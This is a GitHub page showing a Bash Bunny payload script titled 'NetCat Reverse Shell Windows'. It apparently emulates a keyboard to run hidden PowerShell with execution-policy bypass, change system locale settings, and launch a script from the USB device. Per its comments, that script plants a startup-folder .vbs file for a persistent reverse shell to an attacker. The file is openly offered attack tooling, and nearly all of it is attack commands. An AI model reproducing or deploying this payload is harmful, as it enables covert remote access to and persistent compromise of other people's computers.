-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathpayload.txt
29 lines (23 loc) · 977 Bytes
/
payload.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Title: NetCat Reverse Shell Windows
# Description: Creates a persistent reverse shell on Windows and connects back to attacker through NetCat
# Author: 0dyss3us (KeenanV)
# Props:
# Version: 1.0
# Category: Remote Access
# Target: Windows 10
# Attackmodes: HID, Storage
# DUCKY_LANG jp
#Sets attack mode and stores current switch position
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Runs Powershell script which puts a .vbs file in the startup folder and runs it
LED ATTACK
Q DELAY 1000
RUN WIN Powershell -nop -ex Bypass -w Hidden Set-Culture en-US
RUN WIN Powershell -nop -ex Bypass -w Hidden Set-WinSystemLocale -SystemLocale en-US
RUN WIN Powershell -nop -ex Bypass -w Hidden Set-WinUserLanguageList en-US -Force
DELAY 7000
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\foxme.ps1')"
Q DELAY 5000
LED FINISH